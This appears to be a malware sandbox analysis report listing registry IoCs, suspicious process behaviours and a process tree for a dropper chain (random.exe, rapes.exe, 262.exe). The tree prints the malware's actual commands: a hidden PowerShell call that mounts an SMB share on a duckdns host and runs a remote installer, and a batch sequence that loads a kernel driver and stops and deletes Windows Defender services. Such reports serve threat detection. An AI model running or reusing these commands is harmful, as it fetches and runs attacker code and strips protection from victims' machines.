Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f31e7a8e6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	3d892e07dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	934b30a571.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5b6cca16d1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a2bd676b9e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2440	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3428	taskkill.exe
5688	taskkill.exe
1124	taskkill.exe
4608	taskkill.exe
5320	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MeshAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4368	random.exe
4368	random.exe
4416	rapes.exe
4416	rapes.exe
384	powershell.exe
384	powershell.exe
1924	powershell.exe
1924	powershell.exe
1924	powershell.exe
3424	934b30a571.exe
3424	934b30a571.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
3252	powershell.exe
3252	powershell.exe
3252	powershell.exe
3868	powershell.exe
3868	powershell.exe
3868	powershell.exe
408	rapes.exe
408	rapes.exe
5296	5b6cca16d1.exe
5296	5b6cca16d1.exe
5296	5b6cca16d1.exe
5296	5b6cca16d1.exe
5296	5b6cca16d1.exe
5296	5b6cca16d1.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
6880	a2bd676b9e.exe
6880	a2bd676b9e.exe
6880	a2bd676b9e.exe
6880	a2bd676b9e.exe
6880	a2bd676b9e.exe
6880	a2bd676b9e.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
5108	powershell.exe
5108	powershell.exe
5108	powershell.exe
5920	Passwords.com
5920	Passwords.com
5920	Passwords.com
5920	Passwords.com
5920	Passwords.com
5920	Passwords.com
6960	66a7aa70aa.exe
6960	66a7aa70aa.exe
4216	powershell.exe
4216	powershell.exe
4216	powershell.exe
924	rapes.exe
924	rapes.exe
5920	Passwords.com
5920	Passwords.com
5920	Passwords.com
5920	Passwords.com
7792	powershell.exe
7792	powershell.exe
7792	powershell.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
660	Process not Found
660	Process not Found
4328	tzutil.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3736	UZPt0hR.exe
3736	UZPt0hR.exe
3736	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	384	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	3252	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	4608	taskkill.exe
Token: SeDebugPrivilege	5320	taskkill.exe
Token: SeDebugPrivilege	3428	taskkill.exe
Token: SeDebugPrivilege	5688	taskkill.exe
Token: SeDebugPrivilege	1124	taskkill.exe
Token: SeDebugPrivilege	1524	firefox.exe
Token: SeDebugPrivilege	1524	firefox.exe
Token: SeDebugPrivilege	3348	7q8Wm5h.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeDebugPrivilege	6244	tasklist.exe
Token: SeDebugPrivilege	6716	tasklist.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeDebugPrivilege	7792	powershell.exe
Token: SeDebugPrivilege	9000	powershell.exe
Token: SeDebugPrivilege	10096	powershell.exe
Token: SeDebugPrivilege	10596	powershell.exe
Token: SeDebugPrivilege	11148	powershell.exe
Token: SeLoadDriverPrivilege	4328	tzutil.exe
Token: SeDebugPrivilege	11396	powershell.exe
Token: SeDebugPrivilege	6520	FrameworkName.exe
Token: SeDebugPrivilege	12864	RegAsm.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
1524	firefox.exe
5300	3d892e07dd.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
1524	firefox.exe
5920	Passwords.com
5920	Passwords.com
5920	Passwords.com

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5300	3d892e07dd.exe
5920	Passwords.com
5920	Passwords.com
5920	Passwords.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1524	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4368 wrote to memory of 4416	4368	random.exe	88
PID 4368 wrote to memory of 4416	4368	random.exe	88
PID 4368 wrote to memory of 4416	4368	random.exe	88
PID 4416 wrote to memory of 2316	4416	rapes.exe	94
PID 4416 wrote to memory of 2316	4416	rapes.exe	94
PID 4416 wrote to memory of 2316	4416	rapes.exe	94
PID 2316 wrote to memory of 384	2316	cmd.exe	96
PID 2316 wrote to memory of 384	2316	cmd.exe	96
PID 2316 wrote to memory of 384	2316	cmd.exe	96
PID 384 wrote to memory of 868	384	powershell.exe	97
PID 384 wrote to memory of 868	384	powershell.exe	97
PID 384 wrote to memory of 868	384	powershell.exe	97
PID 868 wrote to memory of 3640	868	cmd.exe	99
PID 868 wrote to memory of 3640	868	cmd.exe	99
PID 868 wrote to memory of 3640	868	cmd.exe	99
PID 4416 wrote to memory of 1592	4416	rapes.exe	102
PID 4416 wrote to memory of 1592	4416	rapes.exe	102
PID 4416 wrote to memory of 1592	4416	rapes.exe	102
PID 1592 wrote to memory of 1436	1592	apple.exe	103
PID 1592 wrote to memory of 1436	1592	apple.exe	103
PID 1592 wrote to memory of 1436	1592	apple.exe	103
PID 1436 wrote to memory of 5356	1436	262.exe	105
PID 1436 wrote to memory of 5356	1436	262.exe	105
PID 5356 wrote to memory of 5908	5356	cmd.exe	107
PID 5356 wrote to memory of 5908	5356	cmd.exe	107
PID 5356 wrote to memory of 5908	5356	cmd.exe	107
PID 5908 wrote to memory of 1720	5908	262.exe	108
PID 5908 wrote to memory of 1720	5908	262.exe	108
PID 1720 wrote to memory of 1840	1720	cmd.exe	110
PID 1720 wrote to memory of 1840	1720	cmd.exe	110
PID 1720 wrote to memory of 5636	1720	cmd.exe	111
PID 1720 wrote to memory of 5636	1720	cmd.exe	111
PID 1720 wrote to memory of 2440	1720	cmd.exe	112
PID 1720 wrote to memory of 2440	1720	cmd.exe	112
PID 1720 wrote to memory of 6120	1720	cmd.exe	113
PID 1720 wrote to memory of 6120	1720	cmd.exe	113
PID 1720 wrote to memory of 2056	1720	cmd.exe	114
PID 1720 wrote to memory of 2056	1720	cmd.exe	114
PID 1720 wrote to memory of 4160	1720	cmd.exe	115
PID 1720 wrote to memory of 4160	1720	cmd.exe	115
PID 1720 wrote to memory of 5460	1720	cmd.exe	116
PID 1720 wrote to memory of 5460	1720	cmd.exe	116
PID 1720 wrote to memory of 3328	1720	cmd.exe	117
PID 1720 wrote to memory of 3328	1720	cmd.exe	117
PID 1720 wrote to memory of 5212	1720	cmd.exe	118
PID 1720 wrote to memory of 5212	1720	cmd.exe	118
PID 1720 wrote to memory of 4892	1720	cmd.exe	119
PID 1720 wrote to memory of 4892	1720	cmd.exe	119
PID 1720 wrote to memory of 5368	1720	cmd.exe	120
PID 1720 wrote to memory of 5368	1720	cmd.exe	120
PID 1720 wrote to memory of 336	1720	cmd.exe	121
PID 1720 wrote to memory of 336	1720	cmd.exe	121
PID 1720 wrote to memory of 3696	1720	cmd.exe	122
PID 1720 wrote to memory of 3696	1720	cmd.exe	122
PID 1720 wrote to memory of 2040	1720	cmd.exe	123
PID 1720 wrote to memory of 2040	1720	cmd.exe	123
PID 1720 wrote to memory of 5440	1720	cmd.exe	124
PID 1720 wrote to memory of 5440	1720	cmd.exe	124
PID 1720 wrote to memory of 3192	1720	cmd.exe	125
PID 1720 wrote to memory of 3192	1720	cmd.exe	125
PID 1720 wrote to memory of 2396	1720	cmd.exe	126
PID 1720 wrote to memory of 2396	1720	cmd.exe	126
PID 1720 wrote to memory of 1376	1720	cmd.exe	127
PID 1720 wrote to memory of 1376	1720	cmd.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4368
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2316
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:384
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:868
      - C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3640
      - \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        6⤵
        Sets service image path in registry
        Drops file in Program Files directory
        
        PID:5984
- - C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Users\Admin\AppData\Local\Temp\262.exe
      "C:\Users\Admin\AppData\Local\Temp\262.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1436
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BD26.tmp\BD27.tmp\BD28.bat C:\Users\Admin\AppData\Local\Temp\262.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5356
      - C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe" go
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5908
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BDB2.tmp\BDB3.tmp\BDB4.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"
        7⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:1720
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:5636
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:2440
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:6120
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:2056
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4160
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5460
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:3328
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:5212
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:4892
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:5368
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:336
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:3696
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:2040
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:5440
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:3192
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:2396
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:1376
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:952
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:2472
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:5216
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        Modifies security service
        
        PID:5912
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:4876
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:1636
        
